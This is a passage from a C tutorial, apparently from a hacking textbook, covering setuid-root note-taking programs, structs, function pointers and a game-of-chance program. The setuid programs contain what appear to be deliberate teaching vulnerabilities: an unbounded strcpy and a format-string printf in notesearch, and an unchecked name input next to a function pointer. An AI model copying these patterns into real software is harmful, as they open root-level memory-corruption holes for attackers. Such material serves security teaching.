   free(datafile); 
}

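The output file has been changed from /tmp/notes to /var/notes, so the data is now stored in a more permanent place. The getuid() function is used to get the real user ID, which is written to the datafile on the line before the note's line is written. Since the write() function expects a pointer for its source, the & operator is used on the integer value userid to provide its address.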

reader@hacking:~/booksrc $ gcc -o notetaker notetaker.c
reader@hacking:~/booksrc $ sudo chown root:root ./notetaker
reader@hacking:~/booksrc $ sudo chmod u+s ./notetaker
reader@hacking:~/booksrc $ ls -l ./notetaker
-rwsr-xr-x 1 root root 9015 2007-09-07 05:48 ./notetaker
reader@hacking:~/booksrc $ ./notetaker "this is a test of multiuser notes"
[DEBUG] buffer   @ 0x804a008: 'this is a test of multiuser notes'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ ls -l /var/notes
-rw------- 1 root reader 39 2007-09-07 05:49 /var/notes
reader@hacking:~/booksrc $

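In the preceding output, the notetaker program is compiled and changed to be owned by root, and the setuid permission is set. Now when the program is executed, it runs as the root user, so the file /var/notes is also owned by root when it is created.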

reader@hacking:~/booksrc $ cat /var/notes
cat: /var/notes: Permission denied
reader@hacking:~/booksrc $ sudo cat /var/notes
?
this is a test of multiuser notes
reader@hacking:~/booksrc $ sudo hexdump -C /var/notes
00000000  e7 03 00 00 0a 74 68 69  73 20 69 73 20 61 20 74  |.....this is a t|
00000010  65 73 74 20 6f 66 20 6d  75 6c 74 69 75 73 65 72  |est of multiuser|
00000020  20 6e 6f 74 65 73 0a                              | notes.|
00000027
reader@hacking:~/booksrc $ pcalc 0x03e7
        999             0x3e7           0y1111100111
reader@hacking:~/booksrc $

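The /var/notes file contains the user ID of reader (999) and the note. Because of the little-endian architecture, the 4 bytes of the integer 999 appear reversed in the hex dump: the file begins with e7 03 00 00, while 999 is 0x000003e7.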
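The byte order can be made explicit by rebuilding the integer by hand. The function below is a small sketch (decode_le32() is a hypothetical name, not something notetaker or notesearch uses); unlike reading the 4 bytes straight into an int, it gives the same answer regardless of the byte order of the machine running it.

```c
#include <stdint.h>

// Rebuild a 32-bit value from 4 bytes stored least significant byte first.
uint32_t decode_le32(const unsigned char bytes[4]) {
   return (uint32_t)bytes[0]
        | ((uint32_t)bytes[1] << 8)
        | ((uint32_t)bytes[2] << 16)
        | ((uint32_t)bytes[3] << 24);
}
```

Given the bytes e7 03 00 00 from the hex dump, the result is 0xe7 + 0x03 * 256 = 231 + 768 = 999.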

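In order for a normal user to be able to read the note data, a corresponding setuid root program is needed. The notesearch.c program will read the note data and only display the notes written by that user ID. Additionally, an optional command-line argument can be supplied for a search string. When this is used, only notes matching the search string will be displayed.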

notesearch.c

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h"
#define FILENAME "/var/notes"

int print_notes(int, int, char *);   // Note printing function.
int find_user_note(int, int);        // Seek in file for a note for user.
int search_note(char *, char *);     // Search for keyword function.
void fatal(char *);                  // Fatal error handler

int main(int argc, char *argv[]) {
   int userid, printing=1, fd; // File descriptor
   char searchstring[100];

   if(argc > 1)                        // If there is an arg,
      strcpy(searchstring, argv[1]);   //   that is the search string;
   else                                // otherwise,
      searchstring[0] = 0;             //   search string is empty.

   userid = getuid();
   fd = open(FILENAME, O_RDONLY);   // Open the file for read-only access.
   if(fd == -1)
      fatal("in main() while opening file for reading");

   while(printing)
      printing = print_notes(fd, userid, searchstring);
   printf("-------[ end of note data ]-------\n");
   close(fd);
}

// A function to print the notes for a given uid that match
// an optional search string;
// returns 0 at end of file, 1 if there are still more notes.
int print_notes(int fd, int uid, char *searchstring) {
   int note_length;
   char byte=0, note_buffer[100];

   note_length = find_user_note(fd, uid);
   if(note_length == -1)  // If end of file reached,
      return 0;           //   return 0.

   read(fd, note_buffer, note_length); // Read note data.
   note_buffer[note_length] = 0;       // Terminate the string.

   if(search_note(note_buffer, searchstring)) // If searchstring found,
      printf(note_buffer);                    //   print the note.
   return 1;
}

// A function to find the next note for a given userID;
// returns -1 if the end of the file is reached;
// otherwise, it returns the length of the found note.
int find_user_note(int fd, int user_uid) {
   int note_uid=-1;
   unsigned char byte;
   int length;

   while(note_uid != user_uid) {  // Loop until a note for user_uid is found.

      if(read(fd, &note_uid, 4) != 4) // Read the uid data.
         return -1; // If 4 bytes aren't read, return end of file code.
      if(read(fd, &byte, 1) != 1) // Read the newline separator.
         return -1;

      byte = length = 0;
      while(byte != '\n') {  // Figure out how many bytes to the end of line.
         if(read(fd, &byte, 1) != 1) // Read a single byte.
            return -1;     // If byte isn't read, return end of file code.
         length++;
      }
   }
   lseek(fd, length * -1, SEEK_CUR); // Rewind file reading by length bytes.

   printf("[DEBUG] found a %d byte note for user id %d\n", length, note_uid);
   return length;
}

// A function to search a note for a given keyword;
// returns 1 if a match is found, 0 if there is no match.
int search_note(char *note, char *keyword) {
   int i, keyword_length, match=0;

   keyword_length = strlen(keyword);
   if(keyword_length == 0)  // If there is no search string,
      return 1;              // always "match".

   for(i=0; i < strlen(note); i++) { // Iterate over bytes in note.
      if(note[i] == keyword[match])  // If byte matches keyword,
         match++;   // get ready to check the next byte;
      else {        //   otherwise,
         if(note[i] == keyword[0]) // if that byte matches first keyword byte,
            match = 1;  // start the match count at 1.
         else
            match = 0;  // Otherwise it is zero.
      }
      if(match == keyword_length) // If there is a full match,
         return 1;   // return matched.
   }
   return 0;  // Return not matched.
}
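
One caveat about search_note() above: because the match counter restarts from the first keyword byte on a mismatch, it can miss a keyword that begins with a repeated prefix (searching the note "aaab" for "aab" returns 0). As a hedged alternative, and not the book's implementation, the same return convention can be sketched with the standard strstr() function; the name search_note_strstr() is hypothetical.

```c
#include <string.h>

// Sketch of search_note() built on strstr(); same return convention:
// 1 if keyword occurs in note (or keyword is empty), 0 otherwise.
int search_note_strstr(const char *note, const char *keyword) {
   if(keyword[0] == '\0')   // No search string: always "match".
      return 1;
   return strstr(note, keyword) != NULL;
}
```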

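Most of this code should make sense, but there are some new concepts. The filename is defined at the top instead of using heap memory. Also, the function lseek() is used to rewind the read position in the file. The function call lseek(fd, length * -1, SEEK_CUR); tells the program to move the read position forward from the current position in the file by length * -1 bytes. Since this turns out to be a negative number, the position is moved backward by length bytes.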
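The rewind idiom can be isolated in a tiny helper. This is a sketch under assumptions: peek_byte() is a hypothetical function, not part of notesearch.c, and it only works on descriptors that support seeking (regular files, not pipes or terminals).

```c
#include <sys/types.h>
#include <unistd.h>

// Read one byte at the current position without consuming it.
// Returns the byte (0-255), or -1 at end of file or on error.
int peek_byte(int fd) {
   unsigned char byte;
   if(read(fd, &byte, 1) != 1)
      return -1;
   if(lseek(fd, -1, SEEK_CUR) == (off_t) -1) // Step back over the byte just read.
      return -1;
   return byte;
}
```

Calling peek_byte() twice in a row returns the same byte both times, because each call leaves the read position where it found it.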

reader@hacking:~/booksrc $ gcc -o notesearch notesearch.c
reader@hacking:~/booksrc $ sudo chown root:root ./notesearch
reader@hacking:~/booksrc $ sudo chmod u+s ./notesearch
reader@hacking:~/booksrc $ ./notesearch
[DEBUG] found a 34 byte note for user id 999
this is a test of multiuser notes
-------[ end of note data ]------- 
reader@hacking:~/booksrc $

When compiled and setuid root, the notesearch program works as expected. But this is just a single user; what happens if a different user uses the notetaker and notesearch programs?

reader@hacking:~/booksrc $ sudo su jose
jose@hacking:/home/reader/booksrc $ ./notetaker "This is a note for jose"
[DEBUG] buffer   @ 0x804a008: 'This is a note for jose'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
jose@hacking:/home/reader/booksrc $ ./notesearch 
[DEBUG] found a 24 byte note for user id 501
This is a note for jose
-------[ end of note data ]------- 
jose@hacking:/home/reader/booksrc $

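When the user jose uses these programs, the real user ID is 501. This means that value is added to all notes written with notetaker, and only notes with a matching user ID will be displayed by the notesearch program.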

reader@hacking:~/booksrc $ ./notetaker "This is another note for the reader user"
[DEBUG] buffer   @ 0x804a008: 'This is another note for the reader user'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ ./notesearch 
[DEBUG] found a 34 byte note for user id 999
this is a test of multiuser notes
[DEBUG] found a 41 byte note for user id 999
This is another note for the reader user
-------[ end of note data ]------- 
reader@hacking:~/booksrc $

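Similarly, all notes for the user reader have the user ID 999 attached to them. Even though both the notetaker and notesearch programs are suid root and have full read and write access to the /var/notes datafile, the program logic in notesearch prevents the current user from viewing other users' notes. This is very similar to how the /etc/passwd file stores information for all users, yet programs like chsh and passwd allow any user to change his or her own shell or password.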

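Structs

Sometimes there are multiple variables that should be grouped together and treated like one. In C, structs are variables that can contain many other variables. Structs are often used by various system functions and libraries, so understanding how to use structs is a prerequisite to using these functions.

A simple example will suffice for now. Many time functions use a time struct called tm, which is defined in /usr/include/time.h. The struct's definition is as follows.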

	struct tm {
	     int     tm_sec;        /* seconds */
	     int     tm_min;        /* minutes */
	     int     tm_hour;       /* hours */
	     int     tm_mday;       /* day of the month */
	     int     tm_mon;        /* month */
	     int     tm_year;       /* year */
	     int     tm_wday;       /* day of the week */
	     int     tm_yday;       /* day in the year */
	     int     tm_isdst;      /* daylight saving time */ 
	};

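After this struct is defined, struct tm becomes a usable variable type, which can be used to declare variables and pointers with the data type of the tm struct. The time_example.c program demonstrates this. When time.h is included, the tm struct is defined, which is later used to declare the current_time and time_ptr variables.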

time_example.c

#include <stdio.h>
#include <time.h>

int main() {
   long int seconds_since_epoch;
   struct tm current_time, *time_ptr;
   int hour, minute, second, day, month, year;

   seconds_since_epoch = time(0); // Pass time a null pointer as argument.
   printf("time() - seconds since epoch: %ld\n", seconds_since_epoch);

   time_ptr = &current_time;  // Set time_ptr to the address of
                              // the current_time struct.
   localtime_r(&seconds_since_epoch, time_ptr);

   // Three different ways to access struct elements:
   hour = current_time.tm_hour;  // Direct access
   minute = time_ptr->tm_min;    // Access via pointer
   second = *((int *) time_ptr); // Hacky pointer access

   printf("Current time is: %02d:%02d:%02d\n", hour, minute, second); 
}

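The time() function returns the number of seconds since January 1, 1970. Time on Unix systems is kept relative to this rather arbitrary point in time, which is also known as the epoch. The localtime_r() function expects two pointers as arguments: one to the number of seconds since epoch and the other to a tm struct. The pointer time_ptr has already been set to the address of current_time, an empty tm struct. The address-of operator is used to provide a pointer to seconds_since_epoch for the other argument to localtime_r(), which fills the elements of the tm struct. The elements of structs can be accessed in three different ways; the first two are the proper ways to access struct elements, and the third is a hacked solution. If a struct variable is used, its elements can be accessed by adding the element's name to the end of the variable name with a period. Therefore, current_time.tm_hour will access just the tm_hour element of the tm struct called current_time. Pointers to structs are often used, since it is much more efficient to pass a four-byte pointer than an entire data structure. Struct pointers are so common that C has a built-in method to access struct elements from a struct pointer without needing to dereference the pointer. When using a struct pointer like time_ptr, struct elements can be similarly accessed by the struct element's name, but using a series of characters that looks like an arrow pointing right. Therefore, time_ptr->tm_min will access the tm_min element of the tm struct that is pointed to by time_ptr. The seconds could be accessed via either of these proper methods, using the tm_sec element of the tm struct, but a third method is used. Can you figure out how this third method works?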

reader@hacking:~/booksrc $ gcc time_example.c
reader@hacking:~/booksrc $ ./a.out
time() - seconds since epoch: 1189311588
Current time is: 04:19:48
reader@hacking:~/booksrc $ ./a.out
time() - seconds since epoch: 1189311600
Current time is: 04:20:00
reader@hacking:~/booksrc $

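The program works as expected, but how are the seconds being accessed in the tm struct? Remember that in the end, it's all just memory. Since tm_sec is defined at the beginning of the tm struct, that integer value is also found at the beginning. In the line second = *((int *) time_ptr), the variable time_ptr is typecast from a tm struct pointer to an integer pointer. Then this typecast pointer is dereferenced, returning the data at the pointer's address. Since the address of the tm struct also points to the first element of this struct, this will retrieve the integer value for tm_sec in the struct. The following addition to the time_example.c code (time_example2.c) also dumps the bytes of current_time. This shows that the elements of the tm struct are right next to each other in memory. The elements further down in the struct can also be directly accessed with pointers by simply adding to the address of the pointer.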

time_example2.c

#include <stdio.h>
#include <time.h>

void dump_time_struct_bytes(struct tm *time_ptr, int size) {
   int i;
   unsigned char *raw_ptr;
   printf("bytes of struct located at 0x%08x\n", time_ptr);
   raw_ptr = (unsigned char *) time_ptr;
   for(i=0; i < size; i++)
   {
      printf("%02x ", raw_ptr[i]);
      if(i%16 == 15) // Print a newline every 16 bytes.
         printf("\n");
   }
   printf("\n");
}

int main() {
   long int seconds_since_epoch;
   struct tm current_time, *time_ptr;
   int hour, minute, second, i, *int_ptr;

   seconds_since_epoch = time(0); // Pass time a null pointer as argument.
   printf("time() - seconds since epoch: %ld\n", seconds_since_epoch);

   time_ptr = &current_time;  // Set time_ptr to the address of
                              // the current_time struct.
   localtime_r(&seconds_since_epoch, time_ptr);

   // Three different ways to access struct elements:
   hour = current_time.tm_hour;  // Direct access
   minute = time_ptr->tm_min;    // Access via pointer
   second = *((int *) time_ptr); // Hacky pointer access

   printf("Current time is: %02d:%02d:%02d\n", hour, minute, second);

   dump_time_struct_bytes(time_ptr, sizeof(struct tm));

   minute = hour = 0;  // Clear out minute and hour.
   int_ptr = (int *) time_ptr;

   for(i=0; i < 3; i++) {
      printf("int_ptr @ 0x%08x : %d\n", int_ptr, *int_ptr);
      int_ptr++; // Adding 1 to int_ptr adds 4 to the address,
   }             // since an int is 4 bytes in size. 
}

The results of compiling and executing time_example2.c are as follows.

reader@hacking:~/booksrc $ gcc -g time_example2.c
reader@hacking:~/booksrc $ ./a.out
time() - seconds since epoch: 1189311744
Current time is: 04:22:24
bytes of struct located at 0xbffff7f0
18 00 00 00 16 00 00 00 04 00 00 00 09 00 00 00
08 00 00 00 6b 00 00 00 00 00 00 00 fb 00 00 00
00 00 00 00 00 00 00 00 28 a0 04 08
int_ptr @ 0xbffff7f0 : 24
int_ptr @ 0xbffff7f4 : 22
int_ptr @ 0xbffff7f8 : 4
reader@hacking:~/booksrc $

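While struct memory can be accessed this way, doing so makes assumptions about the types of the variables in the struct and about the lack of any padding between them. Since the struct's definition already records the type of each element, using the proper methods to access struct elements is much easier.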
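When raw access to struct memory is really wanted, the standard offsetof() macro from stddef.h removes the guesswork about padding. The sketch below uses a made-up struct (struct reading and value_via_offset() are hypothetical, chosen because a char followed by an int is a layout where padding is likely).

```c
#include <stddef.h>
#include <string.h>

// Hypothetical struct, standing in for any struct whose layout is not known in advance.
struct reading {
   char tag;     // Padding bytes may follow this one-byte element.
   int  value;
};

// Fetch value through a raw byte pointer, letting offsetof() supply the offset.
int value_via_offset(const struct reading *r) {
   const unsigned char *raw = (const unsigned char *) r;
   int result;
   memcpy(&result, raw + offsetof(struct reading, value), sizeof(result));
   return result;
}
```

The compiler computes offsetof(struct reading, value), so the code stays correct whether or not padding was inserted after tag.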

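Function Pointers

A pointer simply contains a memory address and is given a data type that describes where it points. Usually, pointers are used for variables; however, they can also be used for functions. The funcptr_example.c program demonstrates the use of function pointers.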

funcptr_example.c

#include <stdio.h>

int func_one() {
   printf("This is function one\n");
   return 1;
}

int func_two() {
   printf("This is function two\n");
   return 2;
}

int main() {
   int value;
   int (*function_ptr) ();

   function_ptr = func_one;
   printf("function_ptr is 0x%08x\n", function_ptr);
   value = function_ptr();
   printf("value returned was %d\n", value);

   function_ptr = func_two;
   printf("function_ptr is 0x%08x\n", function_ptr);
   value = function_ptr();
   printf("value returned was %d\n", value); 
}

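In this program, a function pointer named function_ptr is declared in main(). This pointer is then set to point at the function func_one() and is called; then it is set again and used to call func_two(). The output below shows the compilation and execution of this source code.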

reader@hacking:~/booksrc $ gcc funcptr_example.c
reader@hacking:~/booksrc $ ./a.out
function_ptr is 0x08048374
This is function one
value returned was 1
function_ptr is 0x0804838d
This is function two
value returned was 2 
reader@hacking:~/booksrc $

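Pseudo-random Numbers

Since computers are deterministic machines, they cannot produce truly random numbers. But many applications require some form of randomness. Pseudo-random number generator functions fill this need by generating a stream of numbers that is pseudo-random. These functions can produce a seemingly random sequence of numbers started from a seed number; however, the exact same sequence can be generated again with the same seed. If the seed value of the pseudo-random generator function isn't known, though, the sequence will seem random. The generator must be seeded with a value using the function srand(), and from that point on, the function rand() will return a pseudo-random number from 0 to RAND_MAX. These functions and RAND_MAX are defined in stdlib.h. While the numbers rand() returns will appear to be random, they are dependent on the seed value provided to srand(). To maintain pseudo-randomness between subsequent program executions, the randomizer must be seeded with a different value each time. One common practice is to use the number of seconds since epoch (returned from the time() function) as the seed. The rand_example.c program demonstrates this technique.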

rand_example.c

#include <stdio.h>
#include <stdlib.h>
#include <time.h>   // Needed for the time() prototype.

int main() {
   int i;
   printf("RAND_MAX is %u\n", RAND_MAX);
   srand(time(0));

   printf("random values from 0 to RAND_MAX\n");
   for(i=0; i < 8; i++)
      printf("%d\n", rand());
   printf("random values from 1 to 20\n");
   for(i=0; i < 8; i++)
      printf("%d\n", (rand()%20)+1); 
}

Notice how the modulus operator is used to obtain random values from 1 to 20.

reader@hacking:~/booksrc $ gcc rand_example.c
reader@hacking:~/booksrc $ ./a.out
RAND_MAX is 2147483647
random values from 0 to RAND_MAX
815015288
1315541117
2080969327
450538726
710528035
907694519
1525415338
1843056422
random values from 1 to 20
2
3
8
5
9
1
4
20
reader@hacking:~/booksrc $ ./a.out
RAND_MAX is 2147483647
random values from 0 to RAND_MAX
678789658
577505284
1472754734
2134715072
1227404380
1746681907
341911720
93522744
random values from 1 to 20
6
16
12
19
8
19
2
1
reader@hacking:~/booksrc $

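The program's output just displays random numbers. Pseudo-randomness can also be used for more complex programs, as you will see in this section's final program.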

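A Game of Chance

The final program in this section is a set of games of chance that use many of the concepts we've discussed. The program uses pseudo-random number generator functions to provide the element of chance. It has three different game functions, which are called using a single global function pointer, and it uses structs to hold data for the player, which is saved in a file. Multi-user file permissions and user IDs allow multiple users to play and maintain their own account data. The game_of_chance.c program code is heavily documented, and you should be able to understand it at this point.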

game_of_chance.c

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <time.h>
#include <stdlib.h>
#include "hacking.h"

#define DATAFILE "/var/chance.data" // File to store user data

// Custom user struct to store information about users
struct user {
   int uid;
   int credits;
   int highscore;
   char name[100];
   int (*current_game) ();
};

// Function prototypes
int get_player_data();
void register_new_player();
void update_player_data();
void show_highscore();
void jackpot();
void input_name();
void print_cards(char *, char *, int);
int take_wager(int, int);
void play_the_game();
int pick_a_number();
int dealer_no_match();
int find_the_ace();
void fatal(char *);

// Global variables
struct user player;      // Player struct

int main() {
   int choice = 0, last_game = 0; // Start with no choice and no game selected.

   srand(time(0)); // Seed the randomizer with the current time.

   if(get_player_data() == -1)  // Try to read player data from file.
      register_new_player();    // If there is no data, register a new player.

   while(choice != 7) {
      printf("-=[ Game of Chance Menu ]=-\n");
      printf("1 - Play the Pick a Number game\n");
      printf("2 - Play the No Match Dealer game\n");
      printf("3 - Play the Find the Ace game\n");
      printf("4 - View current high score\n");
      printf("5 - Change your user name\n");
      printf("6 - Reset your account at 100 credits\n");
      printf("7 - Quit\n");
      printf("[Name: %s]\n", player.name);
      printf("[You have %u credits] ->  ", player.credits);
      scanf("%d", &choice);

      if((choice < 1) || (choice > 7))
         printf("\n[!!] The number %d is an invalid selection.\n\n", choice);
      else if (choice < 4) {          // Otherwise, choice was a game of some sort.
            if(choice != last_game) { // If the function ptr isn't set
               if(choice == 1)        // then point it at the selected game
                  player.current_game = pick_a_number;
               else if(choice == 2)
                  player.current_game = dealer_no_match;
               else
                  player.current_game = find_the_ace;
               last_game = choice;    // and set last_game.
            }
            play_the_game();          // Play the game.
         }
      else if (choice == 4)
         show_highscore();
      else if (choice == 5) {
         printf("\nChange user name\n");
         printf("Enter your new name: ");
         input_name();
         printf("Your name has been changed.\n\n");
      }
      else if (choice == 6) {
         printf("\nYour account has been reset with 100 credits.\n\n");
         player.credits = 100;
      }
   }
   update_player_data();
   printf("\nThanks for playing! Bye.\n");
}

// This function reads the player data for the current uid
// from the file. It returns -1 if it is unable to find player
// data for the current uid.
int get_player_data() { 
   int fd, uid, read_bytes;
   struct user entry;

   uid = getuid();

   fd = open(DATAFILE, O_RDONLY);
   if(fd == -1) // Can't open the file, maybe it doesn't exist
      return -1;
   read_bytes = read(fd, &entry, sizeof(struct user));    // Read the first chunk.
   while(entry.uid != uid && read_bytes > 0) { // Loop until proper uid is found.
      read_bytes = read(fd, &entry, sizeof(struct user)); // Keep reading.
   }
   close(fd); // Close the file.
   if(read_bytes  < sizeof(struct user)) // This means that the end of file was reached.
      return -1;
   else
      player = entry; // Copy the read entry into the player struct.
   return 1;          // Return a success.
}

// This is the new user registration function.
// It will create a new player account and append it to the file.
void register_new_player()  { 
   int fd;

   printf("-=-={ New Player Registration }=-=-\n");
   printf("Enter your name: ");
   input_name();

   player.uid = getuid();
   player.highscore = player.credits = 100;

   fd = open(DATAFILE, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
   if(fd == -1)
      fatal("in register_new_player() while opening file");
   write(fd, &player, sizeof(struct user));
   close(fd);

   printf("\nWelcome to the Game of Chance %s.\n", player.name);
   printf("You have been given %u credits.\n", player.credits);
}

// This function writes the current player data to the file.
// It is used primarily for updating the credits after games.
void update_player_data() {
   int fd, i, read_uid;
   char burned_byte;

   fd = open(DATAFILE, O_RDWR);
   if(fd == -1) // If open fails here, something is really wrong.
      fatal("in update_player_data() while opening file");
   read(fd, &read_uid, 4);          // Read the uid from the first struct.
   while(read_uid != player.uid) {  // Loop until correct uid is found.
      for(i=0; i < sizeof(struct user) - 4; i++) // Read through the
         read(fd, &burned_byte, 1);             // rest of that struct.
      read(fd, &read_uid, 4);      // Read the uid from the next struct. 
   }
   write(fd, &(player.credits), 4);   // Update credits.
   write(fd, &(player.highscore), 4); // Update highscore.
   write(fd, &(player.name), 100);    // Update name.
   close(fd);
}

// This function will display the current high score and
// the name of the person who set that high score.
void show_highscore() {
   unsigned int top_score = 0;
   char top_name[100];
   struct user entry;
   int fd;

   printf("\n====================| HIGH SCORE |====================\n");
   fd = open(DATAFILE, O_RDONLY);
   if(fd == -1)
      fatal("in show_highscore() while opening file");
   while(read(fd, &entry, sizeof(struct user)) > 0) { // Loop until end of file.
      if(entry.highscore > top_score) {   // If there is a higher score,
            top_score = entry.highscore;  // set top_score to that score
            strcpy(top_name, entry.name); // and top_name to that username.
         }
   }
   close(fd);
   if(top_score > player.highscore)
      printf("%s has the high score of %u\n", top_name, top_score);
   else
      printf("You currently have the high score of %u credits!\n", player.highscore);
   printf("======================================================\n\n");
}

// This function simply awards the jackpot for the Pick a Number game.
void jackpot() {
   printf("*+*+*+*+*+* JACKPOT *+*+*+*+*+*\n");
   printf("You have won the jackpot of 100 credits!\n");
   player.credits += 100;
}

// This function is used to input the player name, since 
// scanf("%s", &whatever) will stop input at the first space.
void input_name() {
   char *name_ptr, input_char='\n';
   while(input_char == '\n')    // Flush any leftover 
      scanf("%c", &input_char); // newline chars.

   name_ptr = (char *) &(player.name); // name_ptr = player name's address
   while(input_char != '\n') {  // Loop until newline.
      *name_ptr = input_char;   // Put the input char into name field.
      scanf("%c", &input_char); // Get the next char.
      name_ptr++;               // Increment the name pointer.
   }
   *name_ptr = 0;  // Terminate the string.
}

// This function prints the 3 cards for the Find the Ace game.
// It expects a message to display, a pointer to the cards array,
// and the card the user has picked as input. If the user_pick is
// -1, then the selection numbers are displayed.
void print_cards(char *message, char *cards, int user_pick) {
   int i;

   printf("\n\t*** %s ***\n", message);
   printf("      \t._.\t._.\t._.\n");
   printf("Cards:\t|%c|\t|%c|\t|%c|\n\t", cards[0], cards[1], cards[2]);
   if(user_pick == -1)
      printf(" 1 \t 2 \t 3\n");
   else {
      for(i=0; i < user_pick; i++)
         printf("\t");
      printf(" ^-- your pick\n");
   }
}

// This function inputs wagers for both the No Match Dealer and
// Find the Ace games. It expects the available credits and the
// previous wager as arguments. The previous_wager is only important
// for the second wager in the Find the Ace game. The function
// returns -1 if the wager is too big or too little, and it returns
// the wager amount otherwise.
int take_wager(int available_credits, int previous_wager) {
   int wager, total_wager;

   printf("How many of your %d credits would you like to wager?  ", available_credits);
   scanf("%d", &wager);
   if(wager < 1) {   // Make sure the wager is greater than 0.
      printf("Nice try, but you must wager a positive number!\n");
      return -1;
   }
   total_wager = previous_wager + wager;
   if(total_wager > available_credits) {  // Confirm available credits
      printf("Your total wager of %d is more than you have!\n", total_wager);
      printf("You only have %d available credits, try again.\n", available_credits);
      return -1;
   }
   return wager;
}

// This function contains a loop to allow the current game to be
// played again. It also writes the new credit totals to file
// after each game is played.
void play_the_game() { 
   int play_again = 1;
   int (*game) ();
   char selection;

   while(play_again) {
      printf("\n[DEBUG] current_game pointer @ 0x%08x\n", player.current_game);
      if(player.current_game() != -1) {         // If the game plays without error and
         if(player.credits > player.highscore)  // a new high score is set,
            player.highscore = player.credits;  // update the highscore.
         printf("\nYou now have %u credits\n", player.credits);
         update_player_data();                  // Write the new credit total to file.
         printf("Would you like to play again? (y/n)  ");
         selection = '\n';
         while(selection == '\n')               // Flush any extra newlines.
            scanf("%c", &selection);
         if(selection == 'n')
            play_again = 0;
      }
      else               // This means the game returned an error,
         play_again = 0; // so return to main menu.
   }
}

// This function is the Pick a Number game.
// It returns -1 if the player doesn't have enough credits.
int pick_a_number() { 
   int pick, winning_number;

   printf("\n####### Pick a Number ######\n");
   printf("This game costs 10 credits to play. Simply pick a number\n");
   printf("between 1 and 20, and if you pick the winning number, you\n");
   printf("will win the jackpot of 100 credits!\n\n");
   winning_number = (rand() % 20) + 1; // Pick a number between 1 and 20.
   if(player.credits < 10) {
      printf("You only have %d credits. That's not enough to play!\n\n", player.credits);
      return -1;  // Not enough credits to play 
   }
   player.credits -= 10; // Deduct 10 credits.
   printf("10 credits have been deducted from your account.\n");
   printf("Pick a number between 1 and 20: ");
   scanf("%d", &pick);

   printf("The winning number is %d\n", winning_number);
   if(pick == winning_number)
      jackpot();
   else
      printf("Sorry, you didn't win.\n");
   return 0;
}

// This is the No Match Dealer game.
// It returns -1 if the player has 0 credits.
int dealer_no_match() { 
   int i, j, numbers[16], wager = -1, match = -1;

   printf("\n::::::: No Match Dealer :::::::\n");
   printf("In this game, you can wager up to all of your credits.\n");
   printf("The dealer will deal out 16 random numbers between 0 and 99.\n");
   printf("If there are no matches among them, you double your money!\n\n");

   if(player.credits == 0) {
      printf("You don't have any credits to wager!\n\n");
      return -1;
   }
   while(wager == -1)
      wager = take_wager(player.credits, 0);

   printf("\t\t::: Dealing out 16 random numbers :::\n");
   for(i=0; i < 16; i++) {
      numbers[i] = rand() % 100; // Pick a number between 0 and 99.
      printf("%2d\t", numbers[i]);
      if(i%8 == 7)               // Print a line break every 8 numbers.
         printf("\n");
   }
   for(i=0; i < 15; i++) {       // Loop looking for matches.
      j = i + 1;
      while(j < 16) {
         if(numbers[i] == numbers[j])
            match = numbers[i];
         j++;
      }
   }
   if(match != -1) {
      printf("The dealer matched the number %d!\n", match);
      printf("You lose %d credits.\n", wager);
      player.credits -= wager;
   } else {
      printf("There were no matches! You win %d credits!\n", wager);
      player.credits += wager;
   }
   return 0;
}

// This is the Find the Ace game.
// It returns -1 if the player has 0 credits.
int find_the_ace() {
   int i, ace, total_wager;
   int invalid_choice, pick = -1, wager_one = -1, wager_two = -1;
   char choice_two, cards[3] = {'X', 'X', 'X'};

   ace = rand()%3; // Place the ace randomly.

   printf("******* Find the Ace *******\n");
   printf("In this game, you can wager up to all of your credits.\n");
   printf("Three cards will be dealt out, two queens and one ace.\n");
   printf("If you find the ace, you will win your wager.\n");
   printf("After choosing a card, one of the queens will be revealed.\n");
   printf("At this point, you may either select a different card or\n");
   printf("increase your wager.\n\n");

   if(player.credits == 0) {
      printf("You don't have any credits to wager!\n\n");
      return -1;
   }

   while(wager_one == -1) // Loop until valid wager is made.
      wager_one = take_wager(player.credits, 0);

   print_cards("Dealing cards", cards, -1);
   pick = -1;
   while((pick < 1) || (pick > 3)) { // Loop until valid pick is made.
      printf("Select a card: 1, 2, or 3  ");
      scanf("%d", &pick);
   }
   pick--; // Adjust the pick since card numbering starts at 0.
   i=0;
   while(i == ace || i == pick) // Keep looping until
      i++;                      // we find a valid queen to reveal.
   cards[i] = 'Q';
   print_cards("Revealing a queen", cards, pick);
   invalid_choice = 1;
   while(invalid_choice) {       // Loop until valid choice is made.
      printf("Would you like to:\n[c]hange your pick\tor\t[i]ncrease your wager?\n");
      printf("Select c or i:  ");
      choice_two = '\n';
      while(choice_two == '\n')  // Flush extra newlines.
         scanf("%c", &choice_two);
      if(choice_two == 'i') {    // Increase wager.
            invalid_choice=0;    // This is a valid choice.
            while(wager_two == -1)   // Loop until valid second wager is made.
               wager_two = take_wager(player.credits, wager_one);
         }
      if(choice_two == 'c') {    // Change pick.
         i = invalid_choice = 0; // Valid choice
         while(i == pick || cards[i] == 'Q') // Loop until the other card
            i++;                             // is found,
         pick = i;                           // and then swap pick.
         printf("Your card pick has been changed to card %d\n", pick+1);
      }
   }

   for(i=0; i < 3; i++) {  // Reveal all of the cards.
      if(ace == i)
         cards[i] = 'A';
      else
         cards[i] = 'Q';
   }
   print_cards("End result", cards, pick);

   if(pick == ace) {  // Handle win.
      printf("You have won %d credits from your first wager\n", wager_one);
      player.credits += wager_one;
      if(wager_two != -1) {
         printf("and an additional %d credits from your second wager!\n", wager_two);
         player.credits += wager_two;
      }
   } else { // Handle loss.
      printf("You have lost %d credits from your first wager\n", wager_one);
      player.credits -= wager_one;
      if(wager_two != -1) {
         printf("and an additional %d credits from your second wager!\n", wager_two);
         player.credits -= wager_two;
      }
   }
   return 0; 
}

Since this is a multi-user program that writes to a file in the /var directory, it must be suid root.

reader@hacking:~/booksrc $ gcc -o game_of_chance game_of_chance.c 
reader@hacking:~/booksrc $ sudo chown root:root ./game_of_chance
reader@hacking:~/booksrc $ sudo chmod u+s ./game_of_chance
reader@hacking:~/booksrc $ ./game_of_chance
